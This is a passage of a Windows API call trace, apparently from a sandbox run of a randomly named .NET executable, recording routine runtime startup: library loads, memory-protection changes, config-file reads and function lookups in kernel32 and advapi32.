pbstr=0x41f09c*=0x0, psz="api-ms-win-appmodel-runtime-l1-1-0.dll", len=0x26 | out: pbstr=0x41f09c*="api-ms-win-appmodel-runtime-l1-1-0.dll") returned 1 [0061.929] CharLowerBuffW (in: lpsz="api-ms-win-appmodel-runtime-l1-1-0.dll", cchLength=0x26 | out: lpsz="api-ms-win-appmodel-runtime-l1-1-0.dll") returned 0x26 [0061.929] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x0 [0061.930] GetLastError () returned 0x7e [0061.930] SetLastError (dwErrCode=0x7e) [0061.939] SysReAllocStringLen (in: pbstr=0x41eac8*=0x0, psz="mscoree.dll", len=0xb | out: pbstr=0x41eac8*="mscoree.dll") returned 1 [0061.939] CharLowerBuffW (in: lpsz="mscoree.dll", cchLength=0xb | out: lpsz="mscoree.dll") returned 0xb [0061.939] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0061.940] GetLastError () returned 0x7e [0061.940] SetLastError (dwErrCode=0x7e) [0061.940] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ab4, cbMultiByte=11, lpWideCharStr=0x41dfa4, cchWideChar=2047 | out: lpWideCharStr="mscoree.dllȂܣ%") returned 11 [0061.940] SysReAllocStringLen (in: pbstr=0x41efa8*=0x0, psz="mscoree.dll", len=0xb | out: pbstr=0x41efa8*="mscoree.dll") returned 1 [0061.940] CharLowerBuffW (in: lpsz="mscoree.dll", cchLength=0xb | out: lpsz="mscoree.dll") returned 0xb [0061.940] LoadLibraryExA (lpLibFileName="mscoree.dll", hFile=0x0, dwFlags=0x0) returned 0x75620000 [0061.940] GetLastError () returned 0x0 [0061.941] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x75621010, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x4, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x20) returned 0x0 [0061.941] GetCurrentProcess () returned 0xffffffff [0061.941] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x75621010, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x20, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x4) returned 0x0 [0061.941] GetCurrentProcess () returned 0xffffffff [0061.941] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x75621018, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x4, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x20) returned 0x0 [0061.941] GetCurrentProcess () returned 0xffffffff [0061.941] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x75621018, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x20, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x4) returned 0x0 [0061.941] GetCurrentProcess () returned 0xffffffff [0061.941] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x75621054, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x4, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x20) returned 0x0 [0061.942] GetCurrentProcess () returned 0xffffffff [0061.942] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x75621054, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x20, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x4) returned 0x0 [0061.942] GetCurrentProcess () returned 0xffffffff [0061.942] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x75621060, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x4, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x20) returned 0x0 [0061.942] GetCurrentProcess () returned 0xffffffff [0061.942] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x75621060, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x20, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x4) returned 0x0 [0061.942] GetCurrentProcess () returned 0xffffffff [0061.942] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x7562107c, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x4, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x20) returned 0x0 [0061.942] GetCurrentProcess () returned 0xffffffff [0061.942] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x7562107c, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x20, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x4) returned 0x0 [0061.942] GetCurrentProcess () returned 0xffffffff [0061.942] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x756210a8, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x4, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x20) returned 0x0 [0061.943] GetCurrentProcess () returned 0xffffffff [0061.943] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x756210a8, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x20, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x4) returned 0x0 [0061.943] GetCurrentProcess () returned 0xffffffff [0061.943] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x7562110c, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x4, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x20) returned 0x0 [0061.943] GetCurrentProcess () returned 0xffffffff [0061.943] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x7562110c, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x20, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x4) returned 0x0 [0061.943] GetCurrentProcess () returned 0xffffffff [0061.943] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x7562114c, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x4, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x20) returned 0x0 [0061.943] GetCurrentProcess () returned 0xffffffff [0061.943] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x7562114c, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x20, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x4) returned 0x0 [0061.944] GetCurrentProcess () returned 0xffffffff [0061.944] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x75621154, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x4, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x20) returned 0x0 [0061.944] GetCurrentProcess () returned 0xffffffff [0061.944] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x75621154, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x20, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x4) returned 0x0 [0061.945] GetCurrentProcess () returned 0xffffffff [0061.945] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x756211b0, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x4, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x20) returned 0x0 [0061.945] GetCurrentProcess () returned 0xffffffff [0061.945] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ef94*=0x756211b0, NumberOfBytesToProtect=0x41ef98, NewAccessProtection=0x20, OldAccessProtection=0x41efcc | out: BaseAddress=0x41ef94*=0x75621000, NumberOfBytesToProtect=0x41ef98, OldAccessProtection=0x41efcc*=0x4) returned 0x0 [0061.945] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.945] GetLastError () returned 0x2 [0061.946] SysReAllocStringLen (in: pbstr=0x41efc0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", len=0x41 | out: pbstr=0x41efc0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config") returned 1 [0061.946] GetThreadLocale () returned 0x409 [0061.946] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0061.946] GetThreadLocale () returned 0x409 [0061.946] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0061.946] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", nBufferLength=0x104, lpBuffer=0x41ed44, lpFilePart=0x41ed40 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", lpFilePart=0x41ed40*="WAQro5oWEZAnSlij.exe.config") returned 0x41 [0061.946] SysReAllocStringLen (in: pbstr=0x41efc0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", len=0x41 | out: pbstr=0x41efc0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config") returned 1 [0061.946] SysReAllocStringLen (in: pbstr=0x41ef70*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", len=0x41 | out: pbstr=0x41ef70*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config") returned 1 [0061.946] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", cchLength=0x41 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe.config") returned 0x41 [0061.946] SysReAllocStringLen (in: pbstr=0x41efc0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe.config", len=0x41 | out: pbstr=0x41efc0*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe.config") returned 1 [0061.946] SetLastError (dwErrCode=0x2) [0061.946] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0061.953] GetLastError () returned 0x0 [0061.953] SysReAllocStringLen (in: pbstr=0x41efe0*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x41efe0*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0061.953] GetThreadLocale () returned 0x409 [0061.953] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0061.953] GetThreadLocale () returned 0x409 [0061.953] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0061.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x104, lpBuffer=0x41ed64, lpFilePart=0x41ed60 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x41ed60*="machine.config") returned 0x43 [0061.953] SysReAllocStringLen (in: pbstr=0x41efe0*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x41efe0*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0061.953] SysReAllocStringLen (in: pbstr=0x41ef90*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x41ef90*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0061.954] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchLength=0x43 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config") returned 0x43 [0061.954] SysReAllocStringLen (in: pbstr=0x41efe0*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", psz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x41efe0*="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config") returned 1 [0061.954] SetLastError (dwErrCode=0x0) [0061.957] GetCurrentThreadId () returned 0xba4 [0061.957] GetCurrentThreadId () returned 0xba4 [0061.957] GetCurrentThreadId () returned 0xba4 [0061.957] GetCurrentThreadId () returned 0xba4 [0061.957] GetCurrentThreadId () returned 0xba4 [0061.957] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0061.957] GetCurrentThreadId () returned 0xba4 [0061.957] GetCurrentThreadId () returned 0xba4 [0061.957] GetCurrentThreadId () returned 0xba4 [0061.957] SetEvent (hEvent=0xbc) returned 1 [0061.957] ReadFile (in: hFile=0x124, lpBuffer=0x6f2638, nNumberOfBytesToRead=0xfff, lpNumberOfBytesRead=0x41efec, lpOverlapped=0x0 | out: lpBuffer=0x6f2638*, lpNumberOfBytesRead=0x41efec*=0xfff, lpOverlapped=0x0) returned 1 [0061.964] GetCurrentThreadId () returned 0xba4 [0061.964] GetCurrentThreadId () returned 0xba4 [0061.964] GetCurrentThreadId () returned 0xba4 [0061.964] GetCurrentThreadId () returned 0xba4 [0061.965] GetCurrentThreadId () returned 0xba4 [0061.965] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0061.965] GetCurrentThreadId () returned 0xba4 [0061.965] GetCurrentThreadId () returned 0xba4 [0061.965] GetCurrentThreadId () returned 0xba4 [0061.965] SetEvent (hEvent=0xbc) returned 1 [0061.965] ReadFile (in: hFile=0x124, lpBuffer=0x6f0630, nNumberOfBytesToRead=0x17f7, lpNumberOfBytesRead=0x41efd4, lpOverlapped=0x0 | out: lpBuffer=0x6f0630*, lpNumberOfBytesRead=0x41efd4*=0x17f7, lpOverlapped=0x0) returned 1 [0061.967] GetCurrentThreadId () returned 0xba4 [0061.967] GetCurrentThreadId () returned 0xba4 [0061.967] GetCurrentThreadId () returned 0xba4 [0061.967] GetCurrentThreadId () returned 0xba4 [0061.967] GetCurrentThreadId () returned 0xba4 [0061.967] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0061.967] GetCurrentThreadId () returned 0xba4 [0061.967] GetCurrentThreadId () returned 0xba4 [0061.967] GetCurrentThreadId () returned 0xba4 [0061.967] SetEvent (hEvent=0xbc) returned 1 [0061.967] ReadFile (in: hFile=0x124, lpBuffer=0x6f0630, nNumberOfBytesToRead=0x1001, lpNumberOfBytesRead=0x41efe4, lpOverlapped=0x0 | out: lpBuffer=0x6f0630*, lpNumberOfBytesRead=0x41efe4*=0x1001, lpOverlapped=0x0) returned 1 [0061.968] GetCurrentThreadId () returned 0xba4 [0061.968] GetCurrentThreadId () returned 0xba4 [0061.968] GetCurrentThreadId () returned 0xba4 [0061.968] GetCurrentThreadId () returned 0xba4 [0061.968] GetCurrentThreadId () returned 0xba4 [0061.968] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0061.968] GetCurrentThreadId () returned 0xba4 [0061.968] GetCurrentThreadId () returned 0xba4 [0061.968] GetCurrentThreadId () returned 0xba4 [0061.968] SetEvent (hEvent=0xbc) returned 1 [0061.968] ReadFile (in: hFile=0x124, lpBuffer=0x6f0630, nNumberOfBytesToRead=0x1002, lpNumberOfBytesRead=0x41efe4, lpOverlapped=0x0 | out: lpBuffer=0x6f0630*, lpNumberOfBytesRead=0x41efe4*=0x1002, lpOverlapped=0x0) returned 1 [0061.969] GetCurrentThreadId () returned 0xba4 [0061.969] GetCurrentThreadId () returned 0xba4 [0061.969] GetCurrentThreadId () returned 0xba4 [0061.969] GetCurrentThreadId () returned 0xba4 [0061.969] GetCurrentThreadId () returned 0xba4 [0061.969] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0061.969] GetCurrentThreadId () returned 0xba4 [0061.969] GetCurrentThreadId () returned 0xba4 [0061.969] GetCurrentThreadId () returned 0xba4 [0061.969] SetEvent (hEvent=0xbc) returned 1 [0061.969] ReadFile (in: hFile=0x124, lpBuffer=0x6f79c0, nNumberOfBytesToRead=0x1f28, lpNumberOfBytesRead=0x41efd8, lpOverlapped=0x0 | out: lpBuffer=0x6f79c0*, lpNumberOfBytesRead=0x41efd8*=0x1f28, lpOverlapped=0x0) returned 1 [0061.971] GetCurrentThreadId () returned 0xba4 [0061.971] ResetEvent (hEvent=0xb8) returned 1 [0061.971] GetCurrentThreadId () returned 0xba4 [0061.971] GetCurrentThreadId () returned 0xba4 [0061.971] GetCurrentThreadId () returned 0xba4 [0061.971] GetCurrentThreadId () returned 0xba4 [0061.971] ResetEvent (hEvent=0xb8) returned 1 [0061.971] GetCurrentThreadId () returned 0xba4 [0061.971] GetCurrentThreadId () returned 0xba4 [0061.971] SetEvent (hEvent=0xbc) returned 1 [0061.971] SetEvent (hEvent=0xb8) returned 1 [0061.971] CloseHandle (hObject=0x124) returned 1 [0061.972] SysReAllocStringLen (in: pbstr=0x41f554*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x41f554*="kernel32") returned 1 [0061.972] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0061.972] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0061.975] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumaHighestNodeNumber") returned 0x76dc20b2 [0061.977] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ab4, cbMultiByte=8, lpWideCharStr=0x41e52c, cchWideChar=2047 | out: lpWideCharStr="kernel32indows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll") returned 8 [0061.977] SysReAllocStringLen (in: pbstr=0x41f530*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x41f530*="kernel32") returned 1 [0061.977] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0061.977] GetModuleHandleA (lpModuleName="kernel32") returned 0x76d30000 [0061.980] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0061.982] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0061.984] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0061.987] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0062.001] SysReAllocStringLen (in: pbstr=0x41ec6c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x41ec6c*="KERNEL32.DLL") returned 1 [0062.001] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0062.002] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.004] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemWindowsDirectoryW") returned 0x76d45213 [0062.005] SysReAllocStringLen (in: pbstr=0x41ef98*=0x0, psz="advapi32", len=0x8 | out: pbstr=0x41ef98*="advapi32") returned 1 [0062.005] CharLowerBuffW (in: lpsz="advapi32", cchLength=0x8 | out: lpsz="advapi32") returned 0x8 [0062.006] GetModuleHandleW (lpModuleName="advapi32") returned 0x77710000 [0062.006] GetProcAddress (hModule=0x77710000, lpProcName="AllocateAndInitializeSid") returned 0x777240e6 [0062.006] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0062.006] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0062.006] GetCurrentThreadId () returned 0xba4 [0062.006] ResetEvent (hEvent=0xb8) returned 1 [0062.007] GetCurrentThreadId () returned 0xba4 [0062.007] GetCurrentThreadId () returned 0xba4 [0062.007] GetCurrentThreadId () returned 0xba4 [0062.007] GetCurrentThreadId () returned 0xba4 [0062.007] ResetEvent (hEvent=0xb8) returned 1 [0062.007] GetCurrentThreadId () returned 0xba4 [0062.007] GetCurrentThreadId () returned 0xba4 [0062.007] SetEvent (hEvent=0xbc) returned 1 [0062.007] SetEvent (hEvent=0xb8) returned 1 [0062.007] CloseHandle (hObject=0x140) returned 1 [0062.007] GetCurrentThreadId () returned 0xba4 [0062.007] ResetEvent (hEvent=0xb8) returned 1 [0062.007] GetCurrentThreadId () returned 0xba4 [0062.007] GetCurrentThreadId () returned 0xba4 [0062.007] GetCurrentThreadId () returned 0xba4 [0062.007] GetCurrentThreadId () returned 0xba4 [0062.007] ResetEvent (hEvent=0xb8) returned 1 [0062.007] GetCurrentThreadId () returned 0xba4 [0062.007] GetCurrentThreadId () returned 0xba4 [0062.007] SetEvent (hEvent=0xbc) returned 1 [0062.007] SetEvent (hEvent=0xb8) returned 1 [0062.007] CloseHandle (hObject=0x144) returned 1 [0062.007] GetProcAddress (hModule=0x77710000, lpProcName="InitializeAcl") returned 0x777245cd [0062.008] GetProcAddress (hModule=0x77710000, lpProcName="AddAccessAllowedAce") returned 0x77724176 [0062.008] GetProcAddress (hModule=0x77710000, lpProcName="FreeSid") returned 0x7772412e [0062.010] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x6e3ef8, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName="Global\\Cor_Private_IPCBlock_v4_2976") returned 0x144 [0062.010] GetCurrentThreadId () returned 0xba4 [0062.010] ResetEvent (hEvent=0xb8) returned 1 [0062.010] GetCurrentThreadId () returned 0xba4 [0062.010] GetCurrentThreadId () returned 0xba4 [0062.010] GetCurrentThreadId () returned 0xba4 [0062.010] GetCurrentThreadId () returned 0xba4 [0062.010] ResetEvent (hEvent=0xb8) returned 1 [0062.010] GetCurrentThreadId () returned 0xba4 [0062.010] GetCurrentThreadId () returned 0xba4 [0062.010] SetEvent (hEvent=0xbc) returned 1 [0062.010] SetEvent (hEvent=0xb8) returned 1 [0062.010] GetCurrentThreadId () returned 0xba4 [0062.010] GetCurrentThreadId () returned 0xba4 [0062.010] GetCurrentThreadId () returned 0xba4 [0062.010] GetCurrentThreadId () returned 0xba4 [0062.010] GetCurrentThreadId () returned 0xba4 [0062.010] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0062.010] GetCurrentThreadId () returned 0xba4 [0062.010] GetCurrentThreadId () returned 0xba4 [0062.010] GetCurrentThreadId () returned 0xba4 [0062.010] SetEvent (hEvent=0xbc) returned 1 [0062.011] MapViewOfFile (hFileMappingObject=0x144, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x110000 [0062.011] SysReAllocStringLen (in: pbstr=0x41ef98*=0x0, psz="advapi32", len=0x8 | out: pbstr=0x41ef98*="advapi32") returned 1 [0062.011] CharLowerBuffW (in: lpsz="advapi32", cchLength=0x8 | out: lpsz="advapi32") returned 0x8 [0062.011] GetModuleHandleW (lpModuleName="advapi32") returned 0x77710000 [0062.011] GetProcAddress (hModule=0x77710000, lpProcName="AllocateAndInitializeSid") returned 0x777240e6 [0062.012] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0062.012] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0062.012] GetCurrentThreadId () returned 0xba4 [0062.012] ResetEvent (hEvent=0xb8) returned 1 [0062.012] GetCurrentThreadId () returned 0xba4 [0062.012] GetCurrentThreadId () returned 0xba4 [0062.012] GetCurrentThreadId () returned 0xba4 [0062.012] GetCurrentThreadId () returned 0xba4 [0062.012] ResetEvent (hEvent=0xb8) returned 1 [0062.012] GetCurrentThreadId () returned 0xba4 [0062.012] GetCurrentThreadId () returned 0xba4 [0062.012] SetEvent (hEvent=0xbc) returned 1 [0062.012] SetEvent (hEvent=0xb8) returned 1 [0062.012] CloseHandle (hObject=0x140) returned 1 [0062.012] GetCurrentThreadId () returned 0xba4 [0062.012] ResetEvent (hEvent=0xb8) returned 1 [0062.012] GetCurrentThreadId () returned 0xba4 [0062.012] GetCurrentThreadId () returned 0xba4 [0062.012] GetCurrentThreadId () returned 0xba4 [0062.012] GetCurrentThreadId () returned 0xba4 [0062.012] ResetEvent (hEvent=0xb8) returned 1 [0062.013] GetCurrentThreadId () returned 0xba4 [0062.013] GetCurrentThreadId () returned 0xba4 [0062.013] SetEvent (hEvent=0xbc) returned 1 [0062.013] SetEvent (hEvent=0xb8) returned 1 [0062.013] CloseHandle (hObject=0x148) returned 1 [0062.013] SysReAllocStringLen (in: pbstr=0x41ed00*=0x0, psz="combase.dll", len=0xb | out: pbstr=0x41ed00*="combase.dll") returned 1 [0062.013] CharLowerBuffW (in: lpsz="combase.dll", cchLength=0xb | out: lpsz="combase.dll") returned 0xb [0062.013] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\combase.dll", hFile=0x0, dwFlags=0x0) returned 0x0 [0062.013] GetLastError () returned 0x7e [0062.013] SetLastError (dwErrCode=0x7e) [0062.015] GetProcAddress (hModule=0x77710000, lpProcName="InitializeAcl") returned 0x777245cd [0062.015] GetProcAddress (hModule=0x77710000, lpProcName="AddAccessAllowedAce") returned 0x77724176 [0062.015] GetProcAddress (hModule=0x77710000, lpProcName="FreeSid") returned 0x7772412e [0062.016] SysReAllocStringLen (in: pbstr=0x41ef68*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x41ef68*="kernel32.dll") returned 1 [0062.016] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0062.016] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0062.018] GetProcAddress (hModule=0x76d30000, lpProcName="AddSIDToBoundaryDescriptor") returned 